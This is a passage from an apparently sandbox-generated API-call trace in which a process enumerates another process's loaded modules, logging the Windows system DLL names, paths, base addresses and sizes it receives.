hProcess=0x214, hModule=0x7fefb270000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0065.068] CoTaskMemFree (pv=0xd91f20) [0065.068] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.068] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0065.081] CoTaskMemFree (pv=0xd91f20) [0065.081] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac50000, lpmodinfo=0x23de788, cb=0x18 | out: lpmodinfo=0x23de788*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0065.088] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.088] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac50000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0065.096] CoTaskMemFree (pv=0xd91f20) [0065.096] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.096] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac50000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0065.103] CoTaskMemFree (pv=0xd91f20) [0065.103] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb830000, lpmodinfo=0x23e0958, cb=0x18 | out: lpmodinfo=0x23e0958*(lpBaseOfDll=0x7fefb830000, SizeOfImage=0x11000, EntryPoint=0x7fefb8314c0)) returned 1 [0065.111] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.111] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0065.120] CoTaskMemFree (pv=0xd91f20) [0065.120] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.120] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")) returned 0x1f [0065.127] CoTaskMemFree (pv=0xd91f20) [0065.128] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9d30000, lpmodinfo=0x23e2b18, cb=0x18 | out: lpmodinfo=0x23e2b18*(lpBaseOfDll=0x7fef9d30000, SizeOfImage=0x42000, EntryPoint=0x7fef9d317e4)) returned 1 [0065.136] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.136] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9d30000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="sqmapi.dll") returned 0xa [0065.144] CoTaskMemFree (pv=0xd91f20) [0065.144] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.144] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9d30000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")) returned 0x1e [0065.152] CoTaskMemFree (pv=0xd91f20) [0065.152] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9ce0000, lpmodinfo=0x23e4cd8, cb=0x18 | out: lpmodinfo=0x23e4cd8*(lpBaseOfDll=0x7fef9ce0000, SizeOfImage=0x47000, EntryPoint=0x7fef9ce1040)) returned 1 [0065.159] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.159] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9ce0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="WDSCORE.dll") returned 0xb [0065.195] CoTaskMemFree (pv=0xd91f20) [0065.213] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.213] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9ce0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WDSCORE.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")) returned 0x1f [0065.219] CoTaskMemFree (pv=0xd91f20) [0065.219] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b40000, lpmodinfo=0x23e6e98, cb=0x18 | out: lpmodinfo=0x23e6e98*(lpBaseOfDll=0x7fef9b40000, SizeOfImage=0x3d000, EntryPoint=0x7fef9b41070)) returned 1 [0065.225] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.225] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b40000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="srvsvc.dll") returned 0xa [0065.232] CoTaskMemFree (pv=0xd91f20) [0065.232] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.232] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b40000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")) returned 0x1e [0065.238] CoTaskMemFree (pv=0xd91f20) [0065.238] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b10000, lpmodinfo=0x23e9058, cb=0x18 | out: lpmodinfo=0x23e9058*(lpBaseOfDll=0x7fef9b10000, SizeOfImage=0x25000, EntryPoint=0x7fef9b28c54)) returned 1 [0065.286] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.286] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b10000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="browser.dll") returned 0xb [0065.292] CoTaskMemFree (pv=0xd91f20) [0065.292] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.292] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b10000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")) returned 0x1f [0065.298] CoTaskMemFree (pv=0xd91f20) [0065.298] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa3a0000, lpmodinfo=0x23eb230, cb=0x18 | out: lpmodinfo=0x23eb230*(lpBaseOfDll=0x7fefa3a0000, SizeOfImage=0x1b0000, EntryPoint=0x7fefa3a1010)) returned 1 [0065.304] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.304] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa3a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="VSSAPI.DLL") returned 0xa [0065.310] CoTaskMemFree (pv=0xd91f20) [0065.311] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.311] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa3a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VSSAPI.DLL" (normalized: "c:\\windows\\system32\\vssapi.dll")) returned 0x1e [0065.317] CoTaskMemFree (pv=0xd91f20) [0065.317] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa380000, lpmodinfo=0x23ed3f0, cb=0x18 | out: lpmodinfo=0x23ed3f0*(lpBaseOfDll=0x7fefa380000, SizeOfImage=0x17000, EntryPoint=0x7fefa381060)) returned 1 [0065.326] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.326] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa380000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="VssTrace.DLL") returned 0xc [0065.332] CoTaskMemFree (pv=0xd91f20) [0065.332] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.333] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa380000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VssTrace.DLL" (normalized: "c:\\windows\\system32\\vsstrace.dll")) returned 0x20 [0065.339] CoTaskMemFree (pv=0xd91f20) [0065.339] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb980000, lpmodinfo=0x23ef5c0, cb=0x18 | out: lpmodinfo=0x23ef5c0*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0065.345] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.345] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb980000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="samcli.dll") returned 0xa [0065.352] CoTaskMemFree (pv=0xd91f20) [0065.352] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.352] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb980000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0065.358] CoTaskMemFree (pv=0xd91f20) [0065.358] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9a80000, lpmodinfo=0x23f1780, cb=0x18 | out: lpmodinfo=0x23f1780*(lpBaseOfDll=0x7fef9a80000, SizeOfImage=0x84000, EntryPoint=0x7fef9ad1118)) returned 1 [0065.364] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.364] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9a80000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="netcfgx.dll") returned 0xb [0065.373] CoTaskMemFree (pv=0xd91f20) [0065.374] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.374] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9a80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")) returned 0x1f [0065.380] CoTaskMemFree (pv=0xd91f20) [0065.380] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb40000, lpmodinfo=0x23f3940, cb=0x18 | out: lpmodinfo=0x23f3940*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0065.386] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.386] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb40000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="devrtl.DLL") returned 0xa [0065.392] CoTaskMemFree (pv=0xd91f20) [0065.393] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.393] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb40000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\devrtl.DLL" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0065.399] CoTaskMemFree (pv=0xd91f20) [0065.399] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9a60000, lpmodinfo=0x23f5b00, cb=0x18 | out: lpmodinfo=0x23f5b00*(lpBaseOfDll=0x7fef9a60000, SizeOfImage=0x1a000, EntryPoint=0x7fef9a73fbc)) returned 1 [0065.405] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.405] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9a60000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="NCI.dll") returned 0x7 [0065.412] CoTaskMemFree (pv=0xd91f20) [0065.412] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.412] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9a60000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCI.dll" (normalized: "c:\\windows\\system32\\nci.dll")) returned 0x1b [0065.422] CoTaskMemFree (pv=0xd91f20) [0065.422] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9930000, lpmodinfo=0x23f7cb0, cb=0x18 | out: lpmodinfo=0x23f7cb0*(lpBaseOfDll=0x7fef9930000, SizeOfImage=0x12c000, EntryPoint=0x7fef99e0ef0)) returned 1 [0065.428] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.428] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9930000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wbemcore.dll") returned 0xc [0065.435] CoTaskMemFree (pv=0xd91f20) [0065.435] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.435] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9930000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")) returned 0x25 [0065.442] CoTaskMemFree (pv=0xd91f20) [0065.442] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef98c0000, lpmodinfo=0x23f9e88, cb=0x18 | out: lpmodinfo=0x23f9e88*(lpBaseOfDll=0x7fef98c0000, SizeOfImage=0x62000, EntryPoint=0x7fef98fbd80)) returned 1 [0065.448] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.448] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef98c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="esscli.dll") returned 0xa [0065.455] CoTaskMemFree (pv=0xd91f20) [0065.455] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.455] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef98c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")) returned 0x23 [0065.468] CoTaskMemFree (pv=0xd91f20) [0065.468] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9bc0000, lpmodinfo=0x23fc050, cb=0x18 | out: lpmodinfo=0x23fc050*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0065.474] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.474] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0065.481] CoTaskMemFree (pv=0xd91f20) [0065.481] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.481] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0065.488] CoTaskMemFree (pv=0xd91f20) [0065.488] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b90000, lpmodinfo=0x23fe228, cb=0x18 | out: lpmodinfo=0x23fe228*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0065.494] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.494] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b90000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0065.501] CoTaskMemFree (pv=0xd91f20) [0065.501] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.501] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b90000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0065.510] CoTaskMemFree (pv=0xd91f20) [0065.510] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef98a0000, lpmodinfo=0x24003e8, cb=0x18 | out: lpmodinfo=0x24003e8*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0065.516] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.516] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef98a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0065.523] CoTaskMemFree (pv=0xd91f20) [0065.523] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.523] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef98a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0065.530] CoTaskMemFree (pv=0xd91f20) [0065.530] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9830000, lpmodinfo=0x24025b8, cb=0x18 | out: lpmodinfo=0x24025b8*(lpBaseOfDll=0x7fef9830000, SizeOfImage=0x6b000, EntryPoint=0x7fef9874344)) returned 1 [0065.536] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.536] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="hnetcfg.dll") returned 0xb [0065.543] CoTaskMemFree (pv=0xd91f20) [0065.543] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.543] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")) returned 0x1f [0065.550] CoTaskMemFree (pv=0xd91f20) [0065.550] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b80000, lpmodinfo=0x2404778, cb=0x18 | out: lpmodinfo=0x2404778*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0065.558] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.558] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b80000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0065.565] CoTaskMemFree (pv=0xd91f20) [0065.565] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.565] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0065.573] CoTaskMemFree (pv=0xd91f20) [0065.573] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce90000, lpmodinfo=0x2406950, cb=0x18 | out: lpmodinfo=0x2406950*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0065.580] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.580] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce90000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0065.587] CoTaskMemFree (pv=0xd91f20) [0065.587] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.587] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce90000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0065.594] CoTaskMemFree (pv=0xd91f20) [0065.594] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef97b0000, lpmodinfo=0x2408b10, cb=0x18 | out: lpmodinfo=0x2408b10*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0065.601] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.601] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef97b0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0065.618] CoTaskMemFree (pv=0xd91f20) [0065.619] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.619] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef97b0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0065.626] CoTaskMemFree (pv=0xd91f20) [0065.626] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9780000, lpmodinfo=0x240ace0, cb=0x18 | out: lpmodinfo=0x240ace0*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0065.633] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.633] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9780000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0065.641] CoTaskMemFree (pv=0xd91f20) [0065.641] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.641] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9780000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0065.649] CoTaskMemFree (pv=0xd91f20) [0065.650] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9720000, lpmodinfo=0x240ceb8, cb=0x18 | out: lpmodinfo=0x240ceb8*(lpBaseOfDll=0x7fef9720000, SizeOfImage=0x5a000, EntryPoint=0x7fef975dde0)) returned 1 [0065.659] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.659] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9720000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="repdrvfs.dll") returned 0xc [0065.669] CoTaskMemFree (pv=0xd91f20) [0065.669] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.669] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9720000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")) returned 0x25 [0065.678] CoTaskMemFree (pv=0xd91f20) [0065.678] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9710000, lpmodinfo=0x240f090, cb=0x18 | out: lpmodinfo=0x240f090*(lpBaseOfDll=0x7fef9710000, SizeOfImage=0x8000, EntryPoint=0x7fef9711020)) returned 1 [0065.689] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.689] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9710000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="SSCORE.DLL") returned 0xa [0065.702] CoTaskMemFree (pv=0xd91f20) [0065.702] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.702] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9710000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSCORE.DLL" (normalized: "c:\\windows\\system32\\sscore.dll")) returned 0x1e [0065.712] CoTaskMemFree (pv=0xd91f20) [0065.712] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef96c0000, lpmodinfo=0x2411268, cb=0x18 | out: lpmodinfo=0x2411268*(lpBaseOfDll=0x7fef96c0000, SizeOfImage=0x50000, EntryPoint=0x7fef96c1190)) returned 1 [0065.721] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.721] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef96c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="CLUSAPI.DLL") returned 0xb [0065.731] CoTaskMemFree (pv=0xd91f20) [0065.731] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.731] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef96c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLUSAPI.DLL" (normalized: "c:\\windows\\system32\\clusapi.dll")) returned 0x1f [0065.746] CoTaskMemFree (pv=0xd91f20) [0065.747] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd310000, lpmodinfo=0x2413428, cb=0x18 | out: lpmodinfo=0x2413428*(lpBaseOfDll=0x7fefd310000, SizeOfImage=0x14000, EntryPoint=0x7fefd314160)) returned 1 [0065.756] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.756] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd310000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="cryptdll.dll") returned 0xc [0065.766] CoTaskMemFree (pv=0xd91f20) [0065.766] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.766] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd310000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")) returned 0x20 [0065.776] CoTaskMemFree (pv=0xd91f20) [0065.776] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef96a0000, lpmodinfo=0x24155f8, cb=0x18 | out: lpmodinfo=0x24155f8*(lpBaseOfDll=0x7fef96a0000, SizeOfImage=0x19000, EntryPoint=0x7fef96a1104)) returned 1 [0065.786] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.786] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef96a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="RESUTILS.DLL") returned 0xc [0065.798] CoTaskMemFree (pv=0xd91f20) [0065.799] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.799] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef96a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RESUTILS.DLL" (normalized: "c:\\windows\\system32\\resutils.dll")) returned 0x20 [0065.809] CoTaskMemFree (pv=0xd91f20) [0065.809] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef95e0000, lpmodinfo=0x24177c8, cb=0x18 | out: lpmodinfo=0x24177c8*(lpBaseOfDll=0x7fef95e0000, SizeOfImage=0xb5000, EntryPoint=0x7fef965cf80)) returned 1 [0065.819] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.819] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef95e0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wmiprvsd.dll") returned 0xc [0065.829] CoTaskMemFree (pv=0xd91f20) [0065.829] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.829] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef95e0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprvsd.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")) returned 0x25 [0065.850] CoTaskMemFree (pv=0xd91f20) [0065.850] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef95c0000, lpmodinfo=0x24199a0, cb=0x18 | out: lpmodinfo=0x24199a0*(lpBaseOfDll=0x7fef95c0000, SizeOfImage=0x12000, EntryPoint=0x7fef95c89d0)) returned 1 [0065.862] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.862] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef95c0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="NCObjAPI.DLL") returned 0xc [0065.876] CoTaskMemFree (pv=0xd91f20) [0065.877] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.877] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef95c0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCObjAPI.DLL" (normalized: "c:\\windows\\system32\\ncobjapi.dll")) returned 0x20 [0065.888] CoTaskMemFree (pv=0xd91f20) [0065.888] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9540000, lpmodinfo=0x241bb70, cb=0x18 | out: lpmodinfo=0x241bb70*(lpBaseOfDll=0x7fef9540000, SizeOfImage=0x71000, EntryPoint=0x7fef95851d0)) returned 1 [0065.895] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.895] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9540000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wbemess.dll") returned 0xb [0065.903] CoTaskMemFree (pv=0xd91f20) [0065.903] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.903] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9540000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")) returned 0x24 [0065.910] CoTaskMemFree (pv=0xd91f20) [0065.910] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac20000, lpmodinfo=0x241dd40, cb=0x18 | out: lpmodinfo=0x241dd40*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0065.919] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0065.919] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac20000, lpBaseName=0xd91f20, nSize=0x800 | out: 